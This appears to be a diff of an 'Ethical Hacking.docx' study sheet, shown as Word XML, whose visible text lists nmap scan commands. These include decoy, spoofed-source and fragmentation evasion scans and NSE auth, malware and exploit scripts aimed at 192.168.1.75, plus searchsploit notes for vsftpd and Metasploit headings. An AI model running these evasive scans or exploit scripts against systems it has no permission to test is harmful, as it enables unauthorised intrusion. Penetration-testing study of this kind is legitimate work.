+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Sudo nmap -sU {IPADDRESS}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Nmap -s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>T</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1729,98 +1629,6 @@
               </w:rPr>
               <w:t xml:space="preserve"> {IPADDRESS}</w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> – </w:t>
-            </w:r>
-            <w:r>
-              <w:t>never full connection</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:r>
-              <w:t>SYN</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> connection – better use</w:t>
-            </w:r>
-            <w:r>
-              <w:t>!</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sU</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {IPADDRESS}</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Nmap -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>T</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> {IPADDRESS}</w:t>
-            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -1854,16 +1662,8 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t xml:space="preserve">man </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>man nmap</w:t>
+            </w:r>
             <w:r>
               <w:t xml:space="preserve"> – manual, really helps!</w:t>
             </w:r>
@@ -1914,35 +1714,14 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
+            <w:r>
+              <w:t>Sudo nmap -</w:t>
             </w:r>
             <w:r>
               <w:t>O</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+              <w:t xml:space="preserve"> {ipaddress}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1969,156 +1748,36 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sV</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -A {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sV</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –version-intensity 9 {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sn</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+            <w:r>
+              <w:t>Sudo nmap -sV {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Sudo nmap -A {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>Sudo nmap -sV –version-intensity 9 {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>nmap -sn {ipaddress}</w:t>
             </w:r>
             <w:r>
               <w:t>-255</w:t>
@@ -2132,21 +1791,12 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -p</w:t>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>nmap -p</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2167,23 +1817,7 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>}</w:t>
+              <w:t xml:space="preserve"> {ipaddress}</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -2232,29 +1866,8 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -f {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">} </w:t>
+            <w:r>
+              <w:t xml:space="preserve">Sudo nmap -f {ipaddress} </w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">– </w:t>
@@ -2275,7 +1888,6 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -2288,15 +1900,7 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve">flood </w:t>
+              <w:t xml:space="preserve">(flood </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2315,57 +1919,27 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -D </w:t>
+              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">RND:5 </w:t>
             </w:r>
             <w:r>
-              <w:t>{</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="gramStart"/>
+              <w:t>{ipaddress}</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> -sS</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -2379,15 +1953,7 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve">flood – when scanning </w:t>
+              <w:t xml:space="preserve">(flood – when scanning </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2406,58 +1972,10 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -D </w:t>
-            </w:r>
-            <w:r>
-              <w:t>{</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}, D {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}, {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}, {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
+            </w:r>
+            <w:r>
+              <w:t>{ipaddress}, D {ipaddress}, {ipaddress}, {ipaddress}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2504,29 +2022,8 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -S 8.8.8.8 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Pn</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -e</w:t>
+            <w:r>
+              <w:t>Sudo nmap -S 8.8.8.8 -Pn -e</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve"> eth0</w:t>
@@ -2597,27 +2094,12 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script auth 192.168.1.75 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">Sudo </w:t>
+            </w:r>
+            <w:r>
+              <w:t>nmap –script auth 192.168.1.75 -sS</w:t>
+            </w:r>
             <w:r>
               <w:t xml:space="preserve">   </w:t>
             </w:r>
@@ -2634,136 +2116,63 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script </w:t>
+            <w:r>
+              <w:t xml:space="preserve">Sudo nmap –script </w:t>
             </w:r>
             <w:r>
               <w:t>malware</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> 192.168.1.75 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">   </w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script banner 192.168.1.75 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">   </w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script exploit 192.168.1.75 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">   </w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t xml:space="preserve"> 192.168.1.75 -sS   </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">Sudo nmap –script banner 192.168.1.75 -sS   </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">Sudo nmap –script exploit 192.168.1.75 -sS   </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Sudo nmap</w:t>
+            </w:r>
             <w:r>
               <w:t xml:space="preserve"> –script-help {name}</w:t>
             </w:r>
@@ -2774,32 +2183,11 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> ftp-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>anon.nse</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> 192.168.175</w:t>
+            <w:r>
+              <w:t>Sudo nmap –script</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> ftp-anon.nse 192.168.175</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2835,16 +2223,8 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t xml:space="preserve">Manual Vulnerability Analysis and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>searchploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Manual Vulnerability Analysis and searchploit</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2866,37 +2246,8 @@
                 <w:numId w:val="5"/>
               </w:numPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sV</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+            <w:r>
+              <w:t>Sudo nmap -sV {ipaddress}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2908,15 +2259,7 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>Find version (</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>vsftpd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> 2.3.)</w:t>
+              <w:t>Find version (vsftpd 2.3.)</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2928,15 +2271,7 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Google it if </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>theres</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> already existing exploitation</w:t>
+              <w:t>Google it if theres already existing exploitation</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2948,13 +2283,8 @@
             <w:pPr>
               <w:ind w:firstLine="720"/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Searchsploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {version}</w:t>
+            <w:r>
+              <w:t>Searchsploit {version}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3124,27 +2454,56 @@
           <w:tcPr>
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>Reverse Shell</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">Bind Shell </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Metaploit Framework Structure</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> – exploit different target and vulnerabilities</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Cd /usr/share/Metasploit-framework</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
       </w:tr>
       <w:tr>

--- a/Ethical Hacking.docx
+++ b/Ethical Hacking.docx
@@ -2500,8 +2500,40 @@
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
-            <w:r>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
               <w:t>Cd /usr/share/Metasploit-framework</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0E0"/>
